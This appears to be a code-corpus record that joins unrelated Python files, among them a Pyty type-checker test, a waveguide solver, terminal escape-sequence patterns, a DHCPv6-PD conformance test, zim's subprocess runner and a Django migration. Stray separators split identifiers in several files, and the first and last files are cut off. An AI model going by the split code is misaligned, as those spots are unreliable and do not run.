semicolons (;) only.
"""
self.index_crash({
'date_processed': self.now,
'app_init_dlls': '/path/to/dll;;foo;C:\\bar\\boo',
})
self.index_crash({
'date_processed': self.now,
'app_init_dlls': '/path/to/dll;D:\\bar\\boo',
})
self.refresh_index()
res = self.api.get(
app_init_dlls='/path/to/dll',
_facets=['app_init_dlls'],
)
assert res['total'] == 2
assert 'app_init_dlls' in res['facets']
facet_terms = [x['term'] for x in res['facets']['app_init_dlls']]
assert '/path/to/dll' in facet_terms
assert 'c:\\bar\\boo' in facet_terms
assert 'foo' in facet_terms
|
jruberg/Pyty | test/unit_tests_core.py | Python | mit | 5,812 | 0.004646 | import unittest
import ast
import sys
import logging
from datetime import datetime
import ast
# Include src in the Python search path.
sys.path.insert(0, '../src')
from ast_extensions import TypeDecASTModule
from check import (check_expr, check_mod, expr_template, call_function)
from parse_file import parse_type_decs
from ptype import PType
from errors import TypeUnspecifiedError, TypeIncorrectlySpecifiedError
from settings import (TEST_CODE_SUBDIR, DEBUG_SUBJECT_FILE, DEBUG_UNTYPED_AST,
DEBUG_TYPED_AST, DEBUG_TYPEDECS)
from logger import Logger, announce_file
from util import log_center
# these should be redundant, but they're necessary to refer to the specific log
# objects.
import ast_extensions
import parse_file
import check
import infer
"""
This is just the core of the unit testing file. generate_tests.py must be run
to fill this file with the several unit tests (each of which tests one source
code file in the test_files directory).
"""
announce_file("unit_tests_core.py")
log = check.log = parse_file.log = infer.log = Logger()
class PytyTests(unittest.TestCase):
def _check_expr(self, s, expr_kind, typ, expected):
"""Typechecks the string C{s} as an C{expr_type} expression."""
a = ast.parse(s).body[0].value
f = expr_template % expr_kind
if expected == "pass" or expected == "fail":
t = PType.from_str(typ)
if expected == "pass":
self.assertEqual(True, call_function(f, a, t, {}),
"%s should typecheck as %s but does not." % (s,t))
elif expected == "fail":
self.assertEqual(False, call_function(f, a, t, {}),
"%s shouldn't typecheck as %s but does." % (s, t))
elif issubclass(eval(expected), Exception):
# if the expected value is an error, then make sure it
# raises the right error.
try:
t = PType.from_str(typ)
call_function(f, a, t, {})
except eval(expected):
pass
else:
self.fail("Should have raised error %s, but does not. (%s)."
% (expected, s))
else:
raise TestFileFormatError("Expression tests can only be" + \
" specified as passing, failing, or raising an error " + \
" specified in errors.py, but this test was specified " + \
" as expecting: " + expected)
def _parse_and_check_mod(self, filename):
with open(filename, 'r') as f:
text = f.read()
debug_file = TEST_CODE_SUBDIR + DEBUG_SUBJECT_FILE
if filename == debug_file:
log.enter_debug_file()
else:
log.exit_debug_file()
log.debug("--- v File : " + filename + " v ---\n" + text + "--- ^ File text ^ ---")
untyped_ast = ast.parse(text)
log.debug((log_center("v Untyped AST v") + str(untyped_ast) +
log_center("^ Untyped AST ^")), DEBUG_UNTYPED_AST)
typedecs = parse_type_decs(filename)
log.debug((log_center("v TypeDecs v") + str(typedecs) +
log_center("^ TypeDecs ^")), DEBUG_TYPEDECS)
typed_ast = TypeDecASTModule(untyped_ast, typedecs)
log.debug((log_center("v TypedAST v") + str(typed_ast) +
log_center("^ TypedAST ^")), DEBUG_TYPED_AST)
return check_mod(typed_ast.tree)
def _check_mod(self, filename):
"""Typechecks the contents of file C{filename} as a
module. The file will contain a header of the form '### Pass'
to indicate whether the module is expected to pass or fail
typechecking or throw a specified error.
"""
with open(filename, 'r') as f:
expected = f.readline().strip('###').strip()
text = f.read()
if expected == "pass":
# the third parameter is a message displayed if assertion fails.
self.assertEqual(True, self._parse_and_check_mod(filename),
"Should typecheck, but does not:\n%s" % text)
elif expected == "fail":
# the third parameter is a message displayed if assertion fails.
self.assertEqual(False, self._parse_and_check_mod(filename),
"Shouldn't typecheck, but does:\n%s" % text)
else:
# in generate_tests.py, we should have already ensured that the
# expected string is "pass", "fail", or a valid error name, so we
# should be able to parse the error name at this point, and if not
# then we have other issues.
try:
err = eval(expected)
except NameError:
# at this point, expected better be a valid error name.
assert(False)
# at this point, the error better actually be a subclass of
# Exception, since generate.py tests will already throw errors if
# improper errors are specified.
assert(issubclass(err, Exception))
try:
result = self._parse_and_check_mod(filename)
self.fail("Should raise error %s, but instead returned %s:\n%s"
% (expec | ted, result, text.strip('\n')))
except err:
pass
except AssertionError | as e:
self.fail(e)
except Exception as e:
self.fail("Should have raised %s, but instead raised %s (%s):\n%s" %
(expected, e.__class__.__name__, e, text.strip('\n')))
##### Generated unit tests will go below here
##### Generated unit tests will go above here
if __name__ == '__main__':
unittest.main()
|
mnishida/PyMWM | src/pymwm/cylinder/__init__.py | Python | mit | 26,692 | 0.000525 | from __future__ import annotations
import cmath
import numpy as np
import psutil
import ray
import scipy.special as ssp
from pymwm.utils import cylinder_utils
from pymwm.waveguide import Database, Sampling, Waveguide
from .samples import Samples, SamplesForRay, SamplesLowLoss, SamplesLowLossForRay
class Cylinder(Waveguide):
"""A class defining a cylindrical waveguide."""
def __init__(self, params):
"""Init Cylinder class.
Args:
params: A dict whose keys and values are as follows:
'core': A dict of the setting parameters of the core:
'shape': A string indicating the shape of the core.
'size': A float indicating the radius of the circular cross
section [um].
'fill': A dict of the parameters of the core Material.
'clad': A dict of the parameters of the clad Material.
'bounds': A dict indicating the bounds of database.interpolation
and its keys and values are as follows:
'wl_max': A float indicating the maximum wavelength [um]
'wl_min': A float indicating the minimum wavelength [um]
'wl_imag': A float indicating the maximum value of
abs(c / f_imag) [um] where f_imag is the imaginary part
of the frequency.
'modes': A dict of the settings for calculating modes:
'wl_max': A float indicating the maximum wavelength [um]
(default: 5.0)
'wl_min': A float indicating the minimum wavelength [um]
(default: 0.4)
'wl_imag': A float indicating the maximum value of
abs(c / f_imag) [um] where f_imag is the imaginary part
of the frequency. (default: 5.0)
'dw': A float indicating frequency interval
[rad c / 1um]=[2.99792458e14 rad / s]
(default: 1 / 64).
'num_n': An integer indicating the number of orders of
modes.
'num_m': An integer indicating the number of modes in each
order and polarization.
'ls': A list of characters chosen from "h" (horizontal
polarization) and "v" (vertical polarization).
"""
super().__init__(params)
self.u_pec, self.jnu_pec, self.jnpu_pec = self.u_jnu_jnpu_pec(
self.num_n, self.num_m
)
def get_alphas(self, alpha_list: list[tuple[str, int, int]]) -> dict:
alphas: dict = {"h": [], "v": []}
for alpha in [("E", 0, m) for m in range(1, self.num_m + 1)]:
if alpha in alpha_list:
alphas["v"].append(alpha)
for alpha in [
("E", n, m) for n in range(1, self.num_n) for m in range(1, self.num_m + 1)
]:
if alpha in alpha_list:
alphas["h"].append(alpha)
alphas["v"].append(alpha)
for alpha in [("M", 0, m) for m in range(1, self.num_m + 1)]:
if alpha in alpha_list:
alphas["h"].append(alpha)
for alpha in [
("M", n, m) for n in range(1, self.num_n) for m in range(1, self.num_m + 1)
]:
if alpha in alpha_list:
al | phas["h"].append(alpha)
alphas["v"].append(alpha)
return alphas
def betas_convs_samples(self, params: dict) -> tuple[dict, dict, Samples]:
im_factor = self.clad.im_factor
self.clad.im_factor = 1.0
self.clad_params["im_factor"] = 1.0
p_modes = params["modes"].copy()
num_n_0 = p_modes["num_n"]
num_m_0 = p_modes["num_m" | ]
betas: dict = {}
convs: dict = {}
success = False
catalog = Database().load_catalog()
num_n_max = catalog["num_n"].max()
num_m_max = catalog["num_m"].max()
if not np.isnan(num_n_max):
for num_n, num_m in [
(n, m)
for n in range(num_n_0, num_n_max + 1)
for m in range(num_m_0, num_m_max + 1)
]:
p_modes["num_n"] = num_n
p_modes["num_m"] = num_m
smp = Samples(self.r, self.fill_params, self.clad_params, p_modes)
try:
betas, convs = smp.database.load()
success = True
break
except IndexError:
continue
if not success:
p_modes["num_n"] = num_n_0
p_modes["num_m"] = num_m_0
betas, convs, smp = self.do_sampling(p_modes)
if im_factor != 1.0:
self.clad.im_factor = im_factor
self.clad_params["im_factor"] = im_factor
betas, convs, smp = self.do_sampling_for_im_factor(betas, convs, p_modes)
return betas, convs, smp
def do_sampling(self, p_modes: dict) -> tuple[dict, dict, Samples]:
num_n_0 = p_modes["num_n"]
num_m_0 = p_modes["num_m"]
smp = Samples(self.r, self.fill_params, self.clad_params, p_modes)
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(p_modes)
pool = ray.util.ActorPool(
SamplesForRay.remote(
self.r, self.fill_params, self.clad_params, p_modes_id
)
for _ in range(psutil.cpu_count())
)
xs_success_wr_list: list[tuple[np.ndarray, np.ndarray]] = list(
pool.map(lambda a, arg: a.wr_sampling.remote(arg), range(num_n_0))
)
num_wr = xs_success_wr_list[0][0].shape[0]
args = []
for n in range(num_n_0):
xs_array, _ = xs_success_wr_list[n]
for iwr in range(num_wr):
args.append((n, iwr, xs_array[iwr]))
xs_success_wi_list: list[tuple[np.ndarray, np.ndarray]] = list(
pool.map(lambda a, arg: a.wi_sampling.remote(arg), args)
)
num_wi = xs_success_wi_list[0][0].shape[0]
xs_success_list: list[tuple[np.ndarray, np.ndarray]] = []
for n in range(num_n_0):
xs_array = np.zeros((num_wr, num_wi, 2 * num_m_0 + 1), dtype=complex)
success_array = np.zeros((num_wr, num_wi, 2 * num_m_0 + 1), dtype=bool)
for iwr in range(num_wr):
i = num_wr * n + iwr
xs_i, success_i = xs_success_wi_list[i]
xs_array[iwr] = xs_i
success_array[iwr] = success_i
xs_success_list.append((xs_array, success_array))
finally:
ray.shutdown()
betas, convs = smp.betas_convs(xs_success_list)
smp.database.save(betas, convs)
return betas, convs, smp
def do_sampling_for_im_factor(
self, betas: dict, convs: dict, p_modes: dict
) -> tuple[dict, dict, SamplesLowLoss]:
smp = SamplesLowLoss(self.r, self.fill_params, self.clad_params, p_modes)
try:
betas, convs = smp.database.load()
except IndexError:
num_n = p_modes["num_n"]
num_m = p_modes["num_m"]
args = []
for iwr in range(len(smp.ws)):
for iwi in range(len(smp.wis)):
xis_list = []
for n in range(num_n):
xis = []
for i in range(num_m + 1):
xis.append(betas[("M", n, i + 1)][iwr, iwi] ** 2)
for i in range(num_m):
xis.append(betas[("E", n, i + 1)][iwr, iwi] ** 2)
xis_list.append(xis)
args.append((iwr, iwi, xis_list))
try:
ray.init()
p_modes_id = ray.put(p_modes)
pool = ray.util.ActorPool(
SamplesLowLossForRay.remote(
|
xtiankisutsa/MARA_Framework | tools/qark/qark/lib/blessed/sequences.py | Python | lgpl-3.0 | 21,604 | 0.000231 | " This sub-module provides 'sequence awareness' for blessed."
__author__ = 'Jeff Quast <contact@jeffquast.com>'
__license__ = 'MIT'
__all__ = ['init_sequence_patterns', 'Sequence', 'SequenceTextWrapper']
import functools
import textwrap
import warnings
import math
import re
_BINTERM_UNSUPPORTED = ('kermit', 'avatar')
_BINTERM_UNSUPPORTED_MSG = ('sequence-awareness for terminals emitting '
'binary-packed capabilities are not supported.')
def _merge_sequences(inp):
"""Merge a list of input sequence patterns for use in a regular expression.
Order by lengthyness (full sequence set precedent over subset),
and exclude any empty (u'') sequences.
"""
return sorted(list(filter(None, inp)), key=len, reverse=True)
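# Example: _merge_sequences(['ab', '', 'abc', 'c']) -> ['abc', 'ab', 'c']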
def _build_numeric_capability(term, cap, optional=False,
base_num=99, nparams=1):
""" Build regexp from capabilities having matching numeric
parameter contained within termcap value: n->(\d+).
"""
_cap = getattr(term, cap)
opt = '?' if optional else ''
if _cap:
args = (base_num,) * nparams
cap_re = re.escape(_cap(*args))
for num in range(base_num-1, base_num+2):
# search for matching ascii, n-1 through n+2
if str(num) in cap_re:
# modify & return n to matching digit expression
cap_re = cap_re.replace(str(num), r'(\d+)%s' % (opt,))
return cap_re
warnings.warn('Unknown parameter in %r (%r, %r)' % (cap, _cap, cap_re))
return None # no such capability
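# Illustrative example (assuming an xterm-like terminfo): term.hpa(99) emits
# something like '\x1b[100G', so the digits are rewritten and the returned
# pattern matches '\x1b[<digits>G'.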
def _build_any_numeric_capability(term, cap, num=99, nparams=1):
""" Build regexp from capabilities having *any* digit parameters
    (substitute any matching digits with the pattern (\d+) and return).
"""
_cap = getattr(term, cap)
if _cap:
cap_re = re.escape(_cap(*((num,) * nparams)))
cap_re = re.sub('(\d+)', r'(\d+)', cap_re)
if r'(\d+)' in cap_re:
return cap_re
warnings.warn('Missing numerics in %r, %r' % (cap, cap_re))
return None # no such capability
def get_movement_sequence_patterns(term):
""" Build and return set of regexp for capabilities of ``term`` known
to cause movement.
"""
bnc = functools.partial(_build_numeric_capa | bility, term)
return set([
# carriage_return
re.escape(term.cr),
# column_address: Horizontal position, absolute
bnc(cap='hpa'),
# row_address: Vertical position #1 absolute
| bnc(cap='vpa'),
# cursor_address: Move to row #1 columns #2
bnc(cap='cup', nparams=2),
# cursor_down: Down one line
re.escape(term.cud1),
# cursor_home: Home cursor (if no cup)
re.escape(term.home),
# cursor_left: Move left one space
re.escape(term.cub1),
# cursor_right: Non-destructive space (move right one space)
re.escape(term.cuf1),
# cursor_up: Up one line
re.escape(term.cuu1),
# param_down_cursor: Down #1 lines
bnc(cap='cud', optional=True),
# restore_cursor: Restore cursor to position of last save_cursor
re.escape(term.rc),
# clear_screen: clear screen and home cursor
re.escape(term.clear),
# cursor_up: Up one line
re.escape(term.enter_fullscreen),
re.escape(term.exit_fullscreen),
# forward cursor
term._cuf,
# backward cursor
term._cub,
])
def get_wontmove_sequence_patterns(term):
""" Build and return set of regexp for capabilities of ``term`` known
not to cause any movement.
"""
bnc = functools.partial(_build_numeric_capability, term)
bna = functools.partial(_build_any_numeric_capability, term)
return list([
# print_screen: Print contents of screen
re.escape(term.mc0),
# prtr_off: Turn off printer
re.escape(term.mc4),
# prtr_on: Turn on printer
re.escape(term.mc5),
# save_cursor: Save current cursor position (P)
re.escape(term.sc),
# set_tab: Set a tab in every row, current columns
re.escape(term.hts),
# enter_bold_mode: Turn on bold (extra bright) mode
re.escape(term.bold),
# enter_standout_mode
re.escape(term.standout),
# enter_subscript_mode
re.escape(term.subscript),
# enter_superscript_mode
re.escape(term.superscript),
# enter_underline_mode: Begin underline mode
re.escape(term.underline),
# enter_blink_mode: Turn on blinking
re.escape(term.blink),
# enter_dim_mode: Turn on half-bright mode
re.escape(term.dim),
# cursor_invisible: Make cursor invisible
re.escape(term.civis),
# cursor_visible: Make cursor very visible
re.escape(term.cvvis),
# cursor_normal: Make cursor appear normal (undo civis/cvvis)
re.escape(term.cnorm),
# clear_all_tabs: Clear all tab stops
re.escape(term.tbc),
# change_scroll_region: Change region to line #1 to line #2
bnc(cap='csr', nparams=2),
# clr_bol: Clear to beginning of line
re.escape(term.el1),
# clr_eol: Clear to end of line
re.escape(term.el),
# clr_eos: Clear to end of screen
re.escape(term.clear_eos),
# delete_character: Delete character
re.escape(term.dch1),
# delete_line: Delete line (P*)
re.escape(term.dl1),
# erase_chars: Erase #1 characters
bnc(cap='ech'),
# insert_line: Insert line (P*)
re.escape(term.il1),
# parm_dch: Delete #1 characters
bnc(cap='dch'),
# parm_delete_line: Delete #1 lines
bnc(cap='dl'),
# exit_alt_charset_mode: End alternate character set (P)
re.escape(term.rmacs),
# exit_am_mode: Turn off automatic margins
re.escape(term.rmam),
# exit_attribute_mode: Turn off all attributes
re.escape(term.sgr0),
# exit_ca_mode: Strings to end programs using cup
re.escape(term.rmcup),
# exit_insert_mode: Exit insert mode
re.escape(term.rmir),
# exit_standout_mode: Exit standout mode
re.escape(term.rmso),
# exit_underline_mode: Exit underline mode
re.escape(term.rmul),
# flash_hook: Flash switch hook
re.escape(term.hook),
# flash_screen: Visible bell (may not move cursor)
re.escape(term.flash),
# keypad_local: Leave 'keyboard_transmit' mode
re.escape(term.rmkx),
# keypad_xmit: Enter 'keyboard_transmit' mode
re.escape(term.smkx),
# meta_off: Turn off meta mode
re.escape(term.rmm),
# meta_on: Turn on meta mode (8th-bit on)
re.escape(term.smm),
# orig_pair: Set default pair to its original value
re.escape(term.op),
# parm_ich: Insert #1 characters
bnc(cap='ich'),
# parm_index: Scroll forward #1
bnc(cap='indn'),
# parm_insert_line: Insert #1 lines
bnc(cap='il'),
# erase_chars: Erase #1 characters
bnc(cap='ech'),
# parm_rindex: Scroll back #1 lines
bnc(cap='rin'),
# parm_up_cursor: Up #1 lines
bnc(cap='cuu'),
# scroll_forward: Scroll text up (P)
re.escape(term.ind),
# scroll_reverse: Scroll text down (P)
re.escape(term.rev),
# tab: Tab to next 8-space hardware tab stop
re.escape(term.ht),
# set_a_background: Set background color to #1, using ANSI escape
bna(cap='setab', num=1),
bna(cap='setab', num=(term.number_of_colors - 1)),
# set_a_foreground: Set foreground color to #1, using ANSI escape
bna(cap='setaf', num=1),
bna(cap='setaf', num=(term.number_of_colors - 1)),
] + [
# set_attributes: Define video attributes #1-#9 (PG9)
# ( not *exactly* legal, being extra forgiving. )
bna(cap='sgr', nparams=_num) for _num in range(1, 10)
# reset_{1,2,3}string: Reset string
] + map(re.escape, (term.r1, term.r2, term. |
tristan-hunt/UVaProblems | sdi.py | Python | gpl-3.0 | 1,195 | 0.057741 | import sys
#seq = list()
def memo_lis(i, memo=None):
    if memo is None:
        memo = dict()
if i == 0:
if i not in memo: #if memo[i] == None:
memo[i] = ([seq[i]])
return([seq[i]])
else:
ans = [seq[i]]
for j in range(0, i):
if seq[i] > seq[j]: # We can add seq[i] after seq[j]
if j not in memo: #if (memo[j] == None):
mem | o[j] = memo_lis(j, memo)
if len(memo[j])+1 > len(ans):
ans = memo[j][::1]
ans.append(seq[i])
memo[i] = ans
return(memo[i])
def print_max():
best = [seq[0]]
memo = dict()
for i in range(0, len(seq)):
if (len(memo_lis(i, memo)) > len(best)):
best = memo_lis(i, memo)
sys.stdout.write("Max hits: {}\n".format(len(best)))
for i in range(0, len(best)):
sys.stdout.write("{}\n".format(best[i]) | )
def load():
this_seq = list()
next(sys.stdin) #eat the blank line
while(1):
a = next(sys.stdin)
if a == '\n':
if len(this_seq) == 0: # Handling blank newline cases
this_seq = [0]
yield(this_seq)
this_seq = list()
else:
a = int(a)
this_seq.append(a)
cases = int(next(sys.stdin))
c = 0
for this_seq in load():
seq = this_seq
if (c):
sys.stdout.write("\n")
print_max()
c = c + 1
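# Worked example: with seq = [1, 3, 2, 4], memo_lis(3) returns [1, 3, 4],
# so print_max() reports "Max hits: 3" followed by 1, 3 and 4.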
|
greghaynes/dib2cloud | dib2cloud/cmd.py | Python | apache-2.0 | 2,959 | 0 | import argparse
import json
imp | ort sys
from dib2cloud import app
# This gives us a convenient place to monkeypatch for testing
def output(out):
print(out)
def upload_summary_dict(upload):
status = 'uploading'
if upload.glance_uuid is not None:
status = 'completed'
retu | rn {
'upload_name': upload.upload_name,
'glance_uuid': upload.glance_uuid,
'status': status
}
def dib_summary_dict(dib, status_str=None):
if status_str is None:
status = dib.succeeded()
if status[0] is True:
status_str = 'completed'
else:
if status[1] == app.DibError.StillRunning:
status_str = 'building'
else:
status_str = 'error'
if dib.is_running():
pid = dib.pid
else:
pid = None
return {
'name': dib.name,
'status': status_str,
'id': dib.uuid,
'pid': pid,
'log': dib.log_path,
'destinations': dib.dest_paths
}
def cmd_build(d2c, args):
dib = d2c.build(args.image_name)
output(json.dumps(dib_summary_dict(dib)).encode('utf-8'))
def cmd_list_builds(d2c, args):
dibs = d2c.get_builds()
output(json.dumps(list(map(dib_summary_dict, dibs))).encode('utf-8'))
def cmd_delete_build(d2c, args):
dib = d2c.delete_build(args.build_id)
output(json.dumps(dib_summary_dict(dib, 'deleted')).encode('utf-8'))
def cmd_upload(d2c, args):
upload = d2c.upload(args.build_id, args.cloud_name)
output(json.dumps(upload_summary_dict(upload)).encode('utf-8'))
def cmd_list_uploads(d2c, args):
uploads = d2c.get_uploads()
output(json.dumps(list(map(upload_summary_dict, uploads))).encode('utf-8'))
def main(argv=None):
argv = argv or sys.argv
parser = argparse.ArgumentParser(prog='dib2cloud')
parser.add_argument('--config', dest='config_path', type=str,
default='/etc/dib2cloud.conf')
subparsers = parser.add_subparsers(help='sub-command help')
build_subparser = subparsers.add_parser('build')
build_subparser.set_defaults(func=cmd_build)
build_subparser.add_argument('image_name', type=str)
list_builds_subparser = subparsers.add_parser('list-builds')
list_builds_subparser.set_defaults(func=cmd_list_builds)
delete_build_subparser = subparsers.add_parser('delete-build')
delete_build_subparser.set_defaults(func=cmd_delete_build)
delete_build_subparser.add_argument('build_id', type=str)
upload_subparser = subparsers.add_parser('upload')
upload_subparser.set_defaults(func=cmd_upload)
upload_subparser.add_argument('build_id', type=str)
upload_subparser.add_argument('cloud_name', type=str)
list_uploads_subparser = subparsers.add_parser('list-uploads')
list_uploads_subparser.set_defaults(func=cmd_list_uploads)
args = parser.parse_args(argv[1:])
args.func(app.App(config_path=args.config_path), args)
|
mwrlabs/veripy | contrib/rfc3633/dr/renew_message.py | Python | gpl-3.0 | 1,596 | 0.008772 | from contrib.rfc3315.constants import *
from contrib.rfc3633.dhcpv6_pd import DHCPv6PDHelper
from scapy.all import *
from veripy.assertions import *
class RenewMessageTestCase(DHCPv6PDHelper):
"""
Requesting Router Initi | ated: Renew Message
Verify that a device can properly | interoperate while using DHCPv6-PD
@private
Source: IPv6 Ready DHCPv6 Interoperability Test Suite (Section 4.2)
"""
def run(self):
prefix, p = self.do_dhcpv6_pd_handshake_as_client(self.target(1), self.node(1))
self.logger.info("Acquired the prefix %s from the DR (T1=%d)." % (prefix, p[DHCP6OptIA_PD].T1))
for i in range(0, 2):
self.ui.wait(p[DHCP6OptIA_PD].T1)
self.node(1).clear_received()
self.logger.info("Sending a DHCPv6 Renew message...")
self.node(1).send(
IPv6(src=str(self.node(1).link_local_ip()), dst=str(AllDHCPv6RelayAgentsAndServers))/
UDP(sport=DHCPv6SourcePort, dport=DHCPv6DestPort)/
self.build_dhcpv6_pd_renew(p, self.target(1), self.node(1)))
self.logger.info("Checking for a DHCPv6 Reply message...")
r1 = self.node(1).received(src=self.target(1).link_local_ip(), type=DHCP6_Reply)
assertEqual(1, len(r1), "expected to receive a DHCPv6 Reply message")
assertHasLayer(DHCP6OptIA_PD, r1[0], "expected the DHCPv6 Reply to contain an IA for Prefix Delegation")
assertHasLayer(DHCP6OptIAPrefix, r1[0], "expected the DHCPv6 Reply to contain an IA Prefix")
|
Osndok/zim-desktop-wiki | zim/applications.py | Python | gpl-2.0 | 11,848 | 0.026671 | # -*- coding: utf-8 -*-
# Copyright 2009,2014 Jaap Karssenberg <jaap.karssenberg@gmail.com>
'''This module contains helper classes for running external applications.
See L{zim.gui.applications} for classes with desktop integration for
applications defined in desktop entry files.
'''
import sys
import os
import logging
import subprocess
import gobject
import zim.fs
import zim.errors
from zim.fs import File
from zim.parsing import split_quoted_strings, is_uri_re, is_win32_path_re
from zim.environ import environ
logger = logging.getLogger('zim.applications')
def _main_is_frozen():
# Detect whether we are running py2exe compiled version
return hasattr(sys, 'frozen') and sys.frozen
class ApplicationError(zim.errors.Error):
	'''Error raised for errors in sub-process execution'''
description = None
def __init__(self, cmd, args, retcode, stderr):
'''Constructor
@param cmd: the application command as string
@param args: tuple of arguments given to the command
@param retcode: the return code of the command (non-zero!)
@param stderr: the error output of the command
'''
self.msg = _('Failed to run application: %s') % cmd
# T: Error message when external application failed, %s is the command
self.description = \
_('%(cmd)s\nreturned non-zero exit status %(code)i') \
% {'cmd': cmd + ' "' + '" "'.join(args) + '"', 'code': retcode}
# T: Error message when external application failed, %(cmd)s is the command, %(code)i the exit code
if stderr:
self.description += '\n\n' + stderr
class Application(object):
'''Base class for objects representing an external application or
command.
@ivar name: the name of the command (default to first item of C{cmd})
@ivar cmd: the command and arguments as a tuple or a string
(when given as a string it will be parsed for quoted arguments)
@ivar tryexeccmd: the command to check in L{tryexec()}, if C{None}
fall back to first item of C{cmd}
'''
STATUS_OK = 0 #: return code when the command executed succesfully
def __init__(self, cmd, tryexeccmd=None, encoding=None):
'''Constructor
@param cmd: the command for the external application, either a
string for the command, or a tuple or list with the command
and arguments
@param tryexeccmd: command to check in L{tryexec()} as st | ring.
If C{None} will default to C{cmd} or the first item of C{cmd}.
@param enco | ding: the encoding to use for commandline args
if known, else falls back to system default
'''
if isinstance(cmd, basestring):
cmd = split_quoted_strings(cmd)
else:
assert isinstance(cmd, (tuple, list))
assert tryexeccmd is None or isinstance(tryexeccmd, basestring)
self.cmd = tuple(cmd)
self.tryexeccmd = tryexeccmd
self.encoding = encoding or zim.fs.ENCODING
if self.encoding == 'mbcs':
self.encoding = 'utf-8'
def __repr__(self):
if hasattr(self, 'key'):
return '<%s: %s>' % (self.__class__.__name__, self.key)
elif hasattr(self, 'cmd'):
return '<%s: %s>' % (self.__class__.__name__, self.cmd)
else:
return '<%s: %s>' % (self.__class__.__name__, self.name)
@property
def name(self):
return self.cmd[0]
@staticmethod
def _lookup(cmd):
'''Lookup cmd in PATH'''
if zim.fs.isabs(cmd):
if zim.fs.isfile(cmd):
return cmd
else:
return None
elif os.name == 'nt':
# Check executable extensions from windows environment
extensions = environ.get_list('PATHEXT', '.com;.exe;.bat;.cmd')
for dir in environ.get_list('PATH'):
for ext in extensions:
file = os.sep.join((dir, cmd + ext))
if zim.fs.isfile(file) and os.access(file, os.X_OK):
return file
else:
return None
else:
# On POSIX no extension is needed to make scripts executable
for dir in environ.get_list('PATH'):
file = os.sep.join((dir, cmd))
if zim.fs.isfile(file) and os.access(file, os.X_OK):
return file
else:
return None
def _cmd(self, args):
# substitute args in the command - to be overloaded by child classes
if args:
return self.cmd + tuple(map(unicode, args))
else:
return self.cmd
def tryexec(self):
'''Check if the executable exists without calling it. This
method is used e.g. to decide what applications to show in the
gui. Uses the C{tryexeccmd}, or the first item of C{cmd} as the
executable name.
@returns: C{True} when the executable was found
'''
cmd = self.tryexeccmd or self.cmd[0]
return not self._lookup(cmd) is None
def _checkargs(self, cwd, args):
assert args is None or isinstance(args, (tuple, list))
argv = self._cmd(args)
# Expand home dir
if argv[0].startswith('~'):
cmd = File(argv[0]).path
argv = list(argv)
argv[0] = cmd
# if it is a python script, insert interpreter as the executable
if argv[0].endswith('.py') and not _main_is_frozen():
argv = list(argv)
argv.insert(0, sys.executable)
# TODO: consider an additional commandline arg to re-use compiled python interpreter
argv = [a.encode(self.encoding) for a in argv]
if cwd:
cwd = unicode(cwd).encode(zim.fs.ENCODING)
return cwd, argv
def run(self, args=None, cwd=None):
'''Run the application in a sub-process and wait for it to finish.
Even when the application runs successfully, any message to stderr
is logged as a warning by zim.
@param args: additional arguments to give to the command as tuple or list
@param cwd: the folder to set as working directory for the command
@raises ApplicationError: if the sub-process returned an error.
'''
cwd, argv = self._checkargs(cwd, args)
logger.info('Running: %s (cwd: %s)', argv, cwd)
if os.name == 'nt':
# http://code.activestate.com/recipes/409002/
info = subprocess.STARTUPINFO()
try:
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
except AttributeError:
info.dwFlags |= 1 # STARTF_USESHOWWINDOW = 0x01
p = subprocess.Popen(argv,
cwd=cwd,
stdout=open(os.devnull, 'w'),
stderr=subprocess.PIPE,
startupinfo=info,
bufsize=4096,
#~ close_fds=True
)
else:
p = subprocess.Popen(argv,
cwd=cwd,
stdout=open(os.devnull, 'w'),
stderr=subprocess.PIPE,
bufsize=4096,
close_fds=True
)
stdout, stderr = p.communicate()
if not p.returncode == self.STATUS_OK:
raise ApplicationError(argv[0], argv[1:], p.returncode, stderr)
#~ elif stderr:
#~ logger.warn(stderr)
def pipe(self, args=None, cwd=None, input=None):
'''Run the application in a sub-process and capture the output.
Like L{run()}, but connects to stdin and stdout for the sub-process.
@note: The data read is buffered in memory, so do not use this
method if the data size is large or unlimited.
@param args: additional arguments to give to the command as tuple or list
@param cwd: the folder to set as working directory for the command
@param input: input for the command as string
@returns: output as a list of lines
@raises ApplicationError: if the sub-process returned an error.
'''
cwd, argv = self._checkargs(cwd, args)
logger.info('Running: %s (cwd: %s)', argv, cwd)
p = subprocess.Popen(argv, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate(input)
        # TODO: handle ApplicationError here as well?
#~ if not p.returncode == self.STATUS_OK:
#~ raise ApplicationError(argv[0], argv[1:], p.returncode, stderr)
#~ elif stderr:
if stderr:
logger.warn(stderr)
# TODO: allow user to get this error as well - e.g. for logging image generator cmd
# Explicit newline conversion, e.g. on windows \r\n -> \n
# FIXME Assume local encoding is respected (!?)
text = [unicode(line + '\n', errors='replace') for line in stdout.splitlines()]
if text and text[-1].endswith('\n') and not stdout.endswith('\n'):
text[-1] = text[-1][:-1] # strip additional \n
return text
def spawn(self, args=None, callback=None, data=None, cwd=None):
'''Start the application in the background and return immediately.
        This is used to start an external application in parallel with
        zim that is not expected to exit immediately, so we do not want
        to wait for it - e.g. a webbrowser to show an URL that was clicked.
@param args: additional arguments to give to the command as |
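# A minimal usage sketch for the Application class documented above. It
# assumes this module is importable as zim.applications and that an 'ls'
# executable exists on PATH; both are illustrative assumptions, not part
# of the original file.
from zim.applications import Application, ApplicationError

app = Application('ls -l')       # a quoted command string is split into a tuple
if app.tryexec():                # look up the executable on PATH without running it
    try:
        lines = app.pipe(args=('/tmp',))   # run and capture stdout as a list of lines
        print(''.join(lines))
    except ApplicationError as err:        # raised on a non-zero exit status
        print(err.msg)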
ctaylo37/OTM2 | opentreemap/treemap/migrations/0079_convert_species_null_values_to_empty_strings.py | Python | gpl-3.0 | 22,255 | 0.007953 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for field in ('species', 'cultivar', 'other', 'gender', 'bloom_period',
'fruit_period', 'fact_sheet', 'plant_guide'):
orm.Species.objects.filter(**{field + '__isnull': True}) \
.update(**{field: ''})
def backwards(self, orm):
"Write your b | ackwards methods here."
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
